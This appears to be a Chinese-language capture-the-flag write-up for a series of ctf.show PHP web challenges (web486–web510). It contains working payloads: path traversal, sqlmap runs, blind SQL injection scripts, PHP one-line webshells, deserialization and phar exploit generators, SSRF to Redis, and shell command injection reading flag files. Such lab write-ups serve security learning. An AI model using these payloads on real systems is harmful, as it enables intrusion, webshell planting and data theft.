目录
web486
扫目录
data:image/s3,"s3://crabby-images/4f65e/4f65ef612e4b222a94888cb6fc83aedcdfc25b48" alt=""
初始界面尝试文件包含index.php,从报错知道其可以目录穿越读文件
login.php是在./templates下的,而./flag.php与./templates均为web目录
payload:
?action=../flag
右键查看源码拿到flag
data:image/s3,"s3://crabby-images/4ba6d/4ba6da1c40f4fa094c743a1054ba6ff40285f518" alt=""
web487
?action=../index
存在sql注入
没有waf,直接sqlmap跑出来
sqlmap -u "https://648b315b-136d-427f-b332-417f4865f221.challenge.ctf.show/index.php?action=check&username=1&password=1" --batch -T ctf -C ctf --dumps
data:image/s3,"s3://crabby-images/725a8/725a8691ceb2eeb078076772d1a58ad0ab33ea6f" alt=""
web488
?action=../index
data:image/s3,"s3://crabby-images/ec116/ec116106aa518b0a1db54602d669a94363e55e96" alt=""
关注点在templateUtil的静态方法上,从index.php一开始include的文件入手
?action=../render/render_class
data:image/s3,"s3://crabby-images/7aa30/7aa30d85d37aa91d28cf376200c717e1c2791360" alt=""
?action=../render/cache_class
data:image/s3,"s3://crabby-images/d498e/d498e4536c30ae0201ce38295cfdaeb09b333983" alt=""
整体利用链很清晰
templateUtil::render(action) -\> templateUtil::shade(templateContent,arg)-\> cache::create_cache(template,cache) -\> fileUtil::write('cache/'.md5(template).".php",$content)
注意到用./template/error.php中存在{{username}},可以用其cache来写马
data:image/s3,"s3://crabby-images/2fed4/2fed4dadfd36f20edb028e6458c7573b766df58c" alt=""
重开个靶机再打入
index.php?action=check&username=<?php eval($_POST[1]);?>&password=12345
注意到{{username}}已经成功被替换为php代码
data:image/s3,"s3://crabby-images/9c9e8/9c9e8ee32185be110eabc41cd9e9ff580258cd56" alt=""
<?php
echo md5("error");
//cb5e100e5a9a3e7f6d1fd97512215282
再访问./cache/cb5e100e5a9a3e7f6d1fd97512215282.php
命令执行拿flag
data:image/s3,"s3://crabby-images/08078/080783631ba6ef470e0a0c1fa85b8f4373688853" alt=""
web489
data:image/s3,"s3://crabby-images/d8329/d832925382e5b86bf471b9d952a35b753a685492" alt=""
和上题一样,在render处打入模板覆盖,用cache写马,但这次只能利用index
data:image/s3,"s3://crabby-images/b4f29/b4f29a17abdad995460cc3bdfd7c77eba6ef31e7" alt=""
配合变量覆盖,让if永真,并让username为一句话木马
/index.php?action=check&username=<?=eval($_POST[cmd]);?>&sql=select%201;
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag
<?php
echo md5("index");
//6a992d5529f459a44fee58c733255e86
data:image/s3,"s3://crabby-images/d1061/d1061709780317c1c0cda82628f35767ca069df3" alt=""
web490
data:image/s3,"s3://crabby-images/e063c/e063c9d1660f17ead4444728a408d1c1a43e931b" alt=""
还是模板注入./templates/index
data:image/s3,"s3://crabby-images/e9a3d/e9a3da1f241cd4c60b803d8f42d1c5f3dbb1eaf4" alt=""
/index.php?action=check&username=' union select '<?php eval($_POST[1]);?>' --+&password=1
data:image/s3,"s3://crabby-images/45023/45023bed5278c0ddf6f21db73cfd54c7ad7f9eaf" alt=""
直接去打会报语法错误
这时候重开下靶机再去读./templates/index.php,发现是给了提示的
data:image/s3,"s3://crabby-images/71603/7160314c49f900f2fdc9c03a8e2260a152a277c7" alt=""
我们模板注入的内容是被<?=?>所包裹,因此要改下payload
/index.php?action=check&username=0' union select "`cat /f*`"--+
再访问./cache/6a992d5529f459a44fee58c733255e86.php直接拿到flag
data:image/s3,"s3://crabby-images/b2f59/b2f5956b53d2dfe78eea49e91cdfb4a5399b1de3" alt=""
web491
data:image/s3,"s3://crabby-images/f3913/f3913790873138710499944ad39023d2d121cb8f" alt=""
这下不能打模板注入了,但可以时间盲注
import requests
string = "}qwertyuioplkjhgfdsazxcvbnm0123456789{-"
url = "http://bbfa1c77-aef0-4827-bd1f-6eafb26e85d0.challenge.ctf.show/index.php?action=check&username="
payload = ""
end = "&password=1"
def exp():
ret = ""
for x in range(1, 50):
for y in string:
payload = "' union select if(substr((select load_file('/flag')),{},1)='{}',sleep(2),1) --+".format(x, y)
try:
req = requests.get(url + payload + end, timeout=2)
except:
ret += y
print(ret)
if __name__ == '__main__':
exp()
data:image/s3,"s3://crabby-images/7d764/7d7640a6ab2c6cc223cb4d646b3caa9f99213034" alt=""
web492
data:image/s3,"s3://crabby-images/6cec9/6cec9ca6a1d258e25c71d31dc5bba6b6b2336a7d" alt=""
关于select_one_array
- 执行一个 SQL 查询。
- 返回查询结果的第一条记录。
- 将这条记录作为数组返回,其中每个数组元素代表一个数据库字段。
模板有一个自动参数绑定,传进去一个user,获取user[username]来替换
data:image/s3,"s3://crabby-images/c64fe/c64fe1a70a585646ed61d85dbddb5fd710f9d012" alt=""
直接走变量覆盖,绕过查库过程
payload:
?action=check&username[]=1&password=1&user[username]=<?php eval($_POST[1]);?>
访问./cache/6a992d5529f459a44fee58c733255e86.php直接拿到flag
data:image/s3,"s3://crabby-images/4b94e/4b94ed0ef2594d850f9ee1ab16f9e7e8ae766308" alt=""
web493
data:image/s3,"s3://crabby-images/3dded/3dded983df1e369bfbf6f2e654353114e4eefa00" alt=""
可以在$_COOKIE处打反序列化
?action=../render/db_class
读到可以利用的恶意类
data:image/s3,"s3://crabby-images/13de7/13de77157eccbfdf164a6b82c8a3d2e793058251" alt=""
exp:
<?php
class dbLog{
public $sql;
public $content='<?php eval($_POST[1]);?>';
public $log='yjh.php';
}
$a=new dbLog();
echo serialize($a);
在Cookie处打入user参数,成功反序列化
data:image/s3,"s3://crabby-images/e0155/e01557425fab74b852abd869c0795d8d36ddc28c" alt=""
访问./yjh.php,命令执行拿flag
data:image/s3,"s3://crabby-images/8c166/8c16608528838107c18b866c6acf20f5b3111075" alt=""
web494
不是很理解这段正则的意义何在(
data:image/s3,"s3://crabby-images/6dde6/6dde6d1c7bbb0b8bd75eaf806178e43c4394a3c5" alt=""
和上题一样打
flag在数据库里,连蚁剑
拿到flag
data:image/s3,"s3://crabby-images/094fe/094fec87ce34b4882bc7cacffeac106ee8596b6e" alt=""
web495
和上题一样
data:image/s3,"s3://crabby-images/f319b/f319b57caf3cf291e364faca788d025a7313aa26" alt=""
拿到flag
data:image/s3,"s3://crabby-images/a5f35/a5f35d7363b3ecb713660ab508a4e0a3e702e40e" alt=""
web496
data:image/s3,"s3://crabby-images/66f18/66f18f8258af4f2f59b9bd2c76927d958d868e07" alt=""
过滤了or
用变形的万能密码登录
' || 1=1#
data:image/s3,"s3://crabby-images/04f37/04f372714ad08ed0dc0c865a86fc5cb23b55843a" alt=""
data:image/s3,"s3://crabby-images/72435/724353ca5fbb59fead4de21224386b9c5cd3ca7a" alt=""
?action=../api/admin_edit
存在查库的操作就会存在布尔盲注的空间
import requests
import string
url="http://f7a0f625-bcc6-43e5-b84d-ea086553a12b.challenge.ctf.show"
s=string.ascii_lowercase+string.digits+",{-}"
sess=requests.session()
sess.post(url+"?action=check",data={"username":"'||1#","password":1})
flag=""
for i in range(9,70):
print(i)
for j in s:
data={
'nickname':str(i*2)+str(j), #不让nickname重复就行
#'user[username]':"'||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1},1,0)#".format(i,j)
#'user[username]':"'||if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagyoudontknow76'),{0},1)='{1}',1,0)#".format(i,j)
'user[username]':"'||if(substr((select flagisherebutyouneverknow118 from flagyoudontknow76),{0},1)='{1}',1,0)#".format(i,j)
}
r=sess.post(url+"/api/admin_edit.php",data=data)
if("u529f" in r.text):
flag+=j
print(flag)
break
data:image/s3,"s3://crabby-images/35888/35888457be16890058d5c165b8a1bed666a7b8df" alt=""
web497
和上题一样用万能密码登录
data:image/s3,"s3://crabby-images/25bdb/25bdb95062447450e114694739907e6acf76f136" alt=""
data:image/s3,"s3://crabby-images/7033d/7033d1511d571d545e6fcd79cedf193edbcd562b" alt=""
点击修改图像,尝试读靶机文件
data:image/s3,"s3://crabby-images/c33f5/c33f5b168925432526c89dc99679f5db0b6f70b1" alt=""
data:image/s3,"s3://crabby-images/adb92/adb92389ff5e377a6ea624ca9f5d30f046718e06" alt=""
base64解码得flag
data:image/s3,"s3://crabby-images/0c461/0c4611d156d016a789b252498018b2e67009800c" alt=""
web498
万能密码登录
修改头像不能直接读/flag
尝试用gopher探测内网组件,结果靶机直接崩了😡,换dict测出来6379
dict://127.0.0.1:6379
data:image/s3,"s3://crabby-images/0e0a8/0e0a80465eb8726854b5018b39847505d448590d" alt=""
gopherus生成payload,打入
data:image/s3,"s3://crabby-images/ae3cb/ae3cb29f26eb1203223083df54259aa8a3d84677" alt=""
data:image/s3,"s3://crabby-images/14452/144527ce7815d744217179ccdaf21738e49c2004" alt=""
访问./shell.php,命令执行拿flag
data:image/s3,"s3://crabby-images/c52fe/c52fe794a2d34cbe36e79c410c3c4d7f8d227a77" alt=""
web499
SSRF打不通了
与上一题相比多了一个系统配置的功能
data:image/s3,"s3://crabby-images/cd8a3/cd8a3cbbf2821daae138d86e9dd851b99490a4d3" alt=""
data:image/s3,"s3://crabby-images/5cd24/5cd24e1c40b18c73fb7b357b208769c37e8c081e" alt=""
?action=../api/admin_settings
读源码看到写文件操作
直接在提交页面写马
data:image/s3,"s3://crabby-images/7b591/7b591928cebb6b54c48a2e3106f879c6e29a397c" alt=""
访问./config/settings.php,命令执行拿到flag
data:image/s3,"s3://crabby-images/c60e1/c60e1d8adae76a1c9f1db5a0b5d02c24038f2efb" alt=""
web500
新功能
data:image/s3,"s3://crabby-images/3c1b3/3c1b3bac31bc8ec36628d599b3c3ad34a55b1ba4" alt=""
data:image/s3,"s3://crabby-images/8aa44/8aa4499854be8b1ee3e9aa584b36c0fb9b5f2a40" alt=""
?action=../api/admin_db_backup
shell_exec可以进行一个命令拼接,无回显RCE考虑写文件
data:image/s3,"s3://crabby-images/9e7ff/9e7ff14a069536004f9e83b91c9581edb0aa8e1b" alt=""
;cat /f*>/var/www/html/flag.txt
data:image/s3,"s3://crabby-images/92ebc/92ebc4a79e181ae0534d78732c885bc6f636a228" alt=""
web501
?action=../api/admin_db_backup
多了一段正则
'^zip'
表示匹配以 "zip" 开头的字符串。'tar'
在任何位置匹配 "tar"。'sql$'
表示匹配以 "sql" 结尾的字符串。
直接访问./api/admin_db_backup.php
data:image/s3,"s3://crabby-images/227a4/227a4c0be11239b90d0c77f4e2188b4a270c23a7" alt=""
payload:
db_format=;cat /f*>/var/www/html/tar.txt
访问./tar.txt拿到flag
data:image/s3,"s3://crabby-images/f6a77/f6a778286d72f77960e89408acdf42553afc7332" alt=""
web502
data:image/s3,"s3://crabby-images/1aef8/1aef817839cfc30179401df5e35aad7ddc912376" alt=""
这段正则检查字符串 db_format
是否严格等于 "zip"、"tar" 或 "sql",db_format是没戏唱了
但可以用$pre来拼接
payload:
db_format=zip&pre=1.txt;cat /f*>/var/www/html/tar.txt;
data:image/s3,"s3://crabby-images/82992/82992fd1aefc76f6295ecf85ccd4472b10c1eb1a" alt=""
访问./tar.txt拿到flag
data:image/s3,"s3://crabby-images/c50fe/c50fe4bce2902687c67516b33dfb3ba46bf3be90" alt=""
web503
data:image/s3,"s3://crabby-images/e5e26/e5e266ea0b75db715bdadd2fa91fdf341c6da7f3" alt=""
可以看到shell_exec因为md5的限制,所以不再能利用
多出了file_exists的利用点,可以用上面提到的恶意类打phar反序列化
此外多了一个上传logo的功能,稳了
data:image/s3,"s3://crabby-images/616ca/616ca97c7f2eddc46535ccc0c4d0503d1ac89051" alt=""
生成恶意phar包,后缀改png,直接上传
<?php
class dbLog{
public $sql;
public $content="<?php eval(\$_POST[1]);?>";
public $log="yjh.php";
}
$c=new dbLog();
$phar = new Phar("ctfshow.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");//设置stub,增加gif文件头
$phar->setMetadata($c); //将自定义meta-data存入manifest
$phar->addFromString("a", "a"); //添加要压缩的文件
$phar->stopBuffering();
?>
data:image/s3,"s3://crabby-images/0c7fe/0c7fec3b976a412746b53ce99844b2a53f5919c1" alt=""
拿到文件上传路径
data:image/s3,"s3://crabby-images/72f17/72f17c825a84c60d1a334e5d30646dec8a511083" alt=""
访问./api/admin_db_backup.php
payload:
pre=phar:///var/www/html/img/3318913d41c2966fc209201c9132b81b&db_format=.png
访问./yjh.php,命令执行拿flag
data:image/s3,"s3://crabby-images/c337e/c337e3b1eba64752e2e579d468ba9194e683c348" alt=""
web505
多了一个文件查看功能
data:image/s3,"s3://crabby-images/4ea7b/4ea7bf3574309b148a9b5213a665503ad023118d" alt=""
data:image/s3,"s3://crabby-images/3bc40/3bc40d4e35e511a5e8e73ae843410d8175135a94" alt=""
读api/admin_file_view.php的源码
data:image/s3,"s3://crabby-images/32f53/32f53bd7ce3449b65c9383f0e49063e0a4a5f334" alt=""
直接data伪协议来包含
payload:
debug=1&f=data://text/plain,user<?php system('tac /f*');?>
data:image/s3,"s3://crabby-images/5149a/5149a95a62c472d85868609d9ba63ccc37399dea" alt=""
web506
和上题一样
data:image/s3,"s3://crabby-images/0b7f5/0b7f55701795cc1dc65acde18f1b1a62fb579f47" alt=""
web507
一样
data:image/s3,"s3://crabby-images/9bdc8/9bdc8c24972ec3d72ad99404387a3025168b49d3" alt=""
web508
把伪协议给waf掉了
data:image/s3,"s3://crabby-images/94652/94652f0710ef9539b5bd677e77f5c62d9fb910da" alt=""
找文件上传点写恶意文件
上传网站logo就可以
data:image/s3,"s3://crabby-images/2a6b5/2a6b5303ec456f66be85ae0dfb53f39c74554672" alt=""
文件内容是user拼接命令执行
拿到文件上传路径
data:image/s3,"s3://crabby-images/fcd6b/fcd6b753a94b70f828cb22fbfde8700723d5ebb0" alt=""
payload:
debug=1&f=/var/www/html/img/f418ad41b0e1cf4bbfcc47e67df49f94.png
data:image/s3,"s3://crabby-images/1fb2f/1fb2fee60008f31adfb251ff296390722aaf8b5e" alt=""
web509
在logo上传处对文件内容有过滤
直接上最短一句话
user<?=`$_GET[1]`;
data:image/s3,"s3://crabby-images/15e7f/15e7fd2d4104e075362a03ed0b4363913aee5436" alt=""
拿到文件上传路径
data:image/s3,"s3://crabby-images/5661e/5661e654b3bb1d6ecb2515a9e8065b6a32341379" alt=""
debug=1&f=/var/www/html/img/f418ad41b0e1cf4bbfcc47e67df49f94.png
data:image/s3,"s3://crabby-images/c7b8c/c7b8ca2ade7358844c18cc330ccaf36e254bb26c" alt=""
web510
对上传文件内容更为严格,并且因为md5的原因,也不能走配置文件base64解密包含的奇技淫巧
于是走session文件包含,其开头还正好是user,完美利用
data:image/s3,"s3://crabby-images/2666a/2666a52e5e24f5353b583e232057890d9e33af8f" alt=""
修改用户信息,写一句话
成功修改
最终payload:
debug=1&f=/tmp/sess_92ke6l244el6unol1mei073gj2
data:image/s3,"s3://crabby-images/83e9a/83e9a1e52ae104c7efc95b1e3302f0e77588c0b6" alt=""